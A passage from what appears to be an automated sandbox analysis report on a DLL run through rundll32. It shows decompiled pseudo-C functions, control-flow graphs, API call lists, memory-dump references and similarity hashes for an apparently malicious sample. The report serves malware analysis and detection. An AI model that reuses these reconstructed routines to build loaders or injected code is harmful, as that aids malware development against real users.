                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				FindCloseChangeNotification(??); // executed
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
                  • String ID:
                  • API String ID: 4170216436-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 180007b94-180007be5 150 180007da3 149->150 151 180007beb-180007bf3 149->151 153 180007da8-180007db8 150->153 151->150 152 180007bf9-180007c24 RtlAllocateHeap 151->152 154 180007c2a-180007c63 memset 152->154 155 180007d9c-180007da1 152->155 156 180007c69-180007c93 154->156 157 180007d6d-180007d85 154->157 155->153 159 180007c98-180007c9b 156->159 160 180007d87-180007d8a 157->160 161 180007d8c-180007d9a HeapFree 157->161 159->157 162 180007ca1-180007caa 159->162 160->153 161->153 163 180007cd6-180007ce7 162->163 164 180007cac-180007cd1 call 180008c48 162->164 166 180007ce9-180007ced 163->166 167 180007d1d-180007d68 163->167 164->163 169 180007cfa-180007d02 166->169 170 180007cef-180007cf8 166->170 167->159 171 180007d07-180007d0e 169->171 170->171 171->166 172 180007d10-180007d18 171->172 172->167
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 180002464-180002482 LoadLibraryA 174 180002484-180002495 call 180007b94 173->174 175 1800024af-1800024b5 GetLastError 173->175 179 1800024a4-1800024ad FreeLibrary 174->179 180 180002497-1800024a2 174->180 176 1800024b7-1800024c8 175->176 179->176 180->176
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 181 180006dcc-180006e1f call 1800089e4 184 180006e21-180006e36 lstrlenW 181->184 185 180006e8a 181->185 187 180006e38-180006e4d lstrcmpiW 184->187 188 180006e4f-180006e77 call 180002594 184->188 186 180006e8f-180006eaf 185->186 187->188 189 180006e7a-180006e88 HeapFree 187->189 188->189 189->186
                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 192 20da1dc3edc-20da1dc405d 194 20da1dc402a-20da1dc40ae 192->194 195 20da1dc405f-20da1dc4069 192->195 199 20da1dc40a0-20da1dc40a8 194->199 200 20da1dc40b0-20da1dc40b8 194->200 196 20da1dc4004-20da1dc400f 195->196 198 20da1dc3f96-20da1dc3fae call 20da1dc4d69 196->198 211 20da1dc3f27-20da1dc3f29 198->211 207 20da1dc4045-20da1dc4253 199->207 202 20da1dc4020-20da1dc409b call 20da1dc4faa 200->202 212 20da1dc4255-20da1dc4257 207->212 213 20da1dc4240-20da1dc424b 207->213 214 20da1dc3f1a-20da1dc3f22 211->214 215 20da1dc3f2b-20da1dc3f31 211->215 217 20da1dc423b-20da1dc423f 212->217 214->211 216 20da1dc3fce-20da1dc3fdb 214->216 215->214 218 20da1dc3f33 215->218 219 20da1dc3f87-20da1dc3f94 216->219 220 20da1dc3fdd-20da1dc3fea 216->220 221 20da1dc3f7a-20da1dc3f85 218->221 219->198 224 20da1dc3f5d-20da1dc3f69 call 20da1dc4929 219->224 222 20da1dc3fec-20da1dc4002 220->222 223 20da1dc3fc0-20da1dc3fc9 220->223 221->219 221->220 222->196 222->207 223->214 228 20da1dc3f6b-20da1dc3f75 call 20da1dc4929 224->228 229 20da1dc3fb3-20da1dc3fbe 224->229 228->221 232 20da1dc4114-20da1dc4121 228->232 229->228 233 20da1dc40f3-20da1dc4100 call 20da1dc5141 232->233 234 20da1dc4123-20da1dc412f 232->234 233->234 239 20da1dc4102-20da1dc410f call 20da1dc4e98 233->239 235 20da1dc40e6-20da1dc40f1 234->235 236 20da1dc4131-20da1dc4139 234->236 235->233 240 20da1dc40db-20da1dc40e4 235->240 238 20da1dc413b-20da1dc4146 236->238 236->239 242 20da1dc4164-20da1dc4175 238->242 239->232 240->235 243 20da1dc40bd-20da1dc40cc RtlAllocateHeap 240->243 242->217 243->238 245 20da1dc40ce-20da1dc40d6 243->245 245->242 248 20da1dc41d8-20da1dc41df 245->248 249 20da1dc41ec-20da1dc41f8 248->249 250 20da1dc41e1-20da1dc41ea 248->250 253 20da1dc41fa-20da1dc4202 249->253 254 20da1dc4215-20da1dc4220 249->254 250->249 252 20da1dc4204-20da1dc4213 call 20da1dc4e98 250->252 252->254 255 20da1dc4222-20da1dc422b call 20da1dc5141 252->255 253->252 256 20da1dc41cb-20da1dc41cf 253->256 254->253 254->255 255->217 261 20da1dc41be-20da1dc41c9 255->261 256->248 261->242
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.311021653.0000020DA1DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020DA1DC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_20da1dc0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: 788901842ea3c300f7427c06859e7f9421c7ec6bc5adc621ed4121117de5ad3c
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: 1381543935A7459FEEA4DBB8C45C7AABAE1FB98340F944D58A0CAC32D3C7318C459706
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 262 1800025ec-180002607 SleepEx 263 180002609-180002610 262->263 264 18000261b-18000261f 262->264 263->264 265 180002612-180002615 WaitForSingleObject 263->265 265->264
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.311021653.0000020DA1DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020DA1DC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_20da1dc0000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: fdec3fbdb6c07459c4ec659620563eff675534ea4a8ec7eda37f93c36b0ca37f
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: BB51117871A744AFEBA4DBB8C05C7AB76E1FB84340F940D1DA086C32D2D734C8859B46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 20da1dc1c0b 315 20da1dc1d2e-20da1dc1d3b 314->315 316 20da1dc1d12-20da1dc1d1d 315->316 317 20da1dc1d3d-20da1dc1d4a 315->317 320 20da1dc1d02-20da1dc1d10 call 20da1dc4929 316->320 321 20da1dc1d1f-20da1dc1d2c call 20da1dc4929 316->321 318 20da1dc1d69-20da1dc1d72 317->318 319 20da1dc1d4c-20da1dc1d58 317->319 323 20da1dc1d78-20da1dc1d83 318->323 324 20da1dc1cf3-20da1dc1d00 call 20da1dc4e98 318->324 319->321 322 20da1dc1d5a-20da1dc1d64 319->322 320->316 320->319 321->315 321->317 328 20da1dc1c7c-20da1dc1c86 322->328 329 20da1dc1d85-20da1dc1d91 323->329 330 20da1dc1d93-20da1dc1d9b 323->330 324->320 338 20da1dc1ce8-20da1dc1cf1 call 20da1dc5141 324->338 334 20da1dc1c29-20da1dc1cc6 328->334 335 20da1dc1c88-20da1dc1db4 call 20da1dc1db9 328->335 329->330 336 20da1dc1d9d-20da1dc1da6 329->336 330->329 330->336 349 20da1dc1cc8 334->349 350 20da1dc1ccd-20da1dc1cd5 334->350 340 20da1dc1cda-20da1dc1cdb 336->340 341 20da1dc1dab 336->341 338->322 343 20da1dc1cdf-20da1dc1ce3 340->343 343->341 349->350 351 20da1dc1c36-20da1dc1c43 349->351 352 20da1dc1c45-20da1dc1c51 call 20da1dc3499 350->352 351->352 353 20da1dc1c62-20da1dc1c6b 351->353 356 20da1dc1c53-20da1dc1c60 352->356 357 20da1dc1c6f-20da1dc1c7a call 20da1dc5141 352->357 353->343 356->353 358 20da1dc1c97-20da1dc1ca1 356->358 357->328 357->356 361 20da1dc1ca7-20da1dc1cad 358->361 362 20da1dc1c1e-20da1dc1c27 RtlAllocateHeap 358->362 363 20da1dc1cb4-20da1dc1cb9 361->363 364 20da1dc1caf call 20da1dc5141 361->364 362->361 363->335 367 20da1dc1c19 364->367 367->323
                  Memory Dump Source
                  • Source File: 00000005.00000002.311021653.0000020DA1DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020DA1DC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_20da1dc0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: 87945cce7097d8e959b52b54159b4ff0856dce4c1fa2f2aec40991d629125c10
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: 48510F7871A768CFEAA4EBBC815C769B6E1FB84300F944D5DF086C3293D7249C819B42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 180008d78-180008dca call 180002370 409 1800090ee 406->409 410 180008dd0-180008df3 406->410 411 1800090f3-18000910c 409->411 412 180008f65 410->412 413 180008df9-180008e1a lstrlenA HeapAlloc 410->413 414 180008f6a-180008f7f HeapFree 412->414 415 1800090e4-1800090e9 413->415 416 180008e20-180008e38 memcpy 413->416 414->411 417 180008f85-180008fa5 call 180002370 414->417 415->414 418 180008e3c-180008e3f 416->418 417->409 424 180008fab-180008fc8 call 1800038f8 417->424 420 180008e41-180008e44 418->420 421 180008e46-180008e49 418->421 420->421 423 180008e4b-180008e4e 420->423 421->418 425 180008ecc 423->425 426 180008e50-180008e79 lstrlenA HeapAlloc 423->426 433 180008fd2-180008ff5 call 180002370 424->433 434 180008fca-180008fcc 424->434 428 180008ece 425->428 426->428 429 180008e7b 426->429 431 180008ed6-180008ed8 428->431 432 180008e7e-180008e85 429->432 435 180008eda-180008f03 call 18000958c 431->435 436 180008f4f-180008f5d HeapFree 431->436 437 180008e87-180008e8a 432->437 438 180008e99 432->438 448 180008ff7-18000902d call 18000958c memcpy 433->448 449 18000905e-180009081 call 180002370 433->449 434->409 434->433 452 180008f05 435->452 453 180008f09-180008f1b LeaveCriticalSection 435->453 436->412 442 180008e95-180008e97 437->442 443 180008e8c-180008e93 437->443 439 180008e9b-180008e9e 438->439 444 180008eb5-180008ec3 439->444 445 180008ea0-180008ea3 439->445 442->438 442->439 443->437 443->442 444->432 451 180008ec5-180008eca 444->451 450 180008ea6-180008ea9 445->450 462 180009043-180009058 LeaveCriticalSection HeapFree 448->462 463 18000902f-18000903e memset 448->463 449->411 464 180009083-180009099 call 1800038f8 449->464 457 180008eab-180008eae 450->457 458 180008eb0-180008eb3 450->458 451->431 452->453 455 180008f1d-180008f38 HeapFree * 2 453->455 456 180008f3e-180008f4d 453->456 455->456 456->414 457->444 457->458 458->450 462->449 463->462 464->411 467 18000909b-1800090a4 464->467 467->411 468 1800090a6-1800090e2 call 18000958c GetSystemTimeAsFileTime LeaveCriticalSection 467->468 468->411
                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
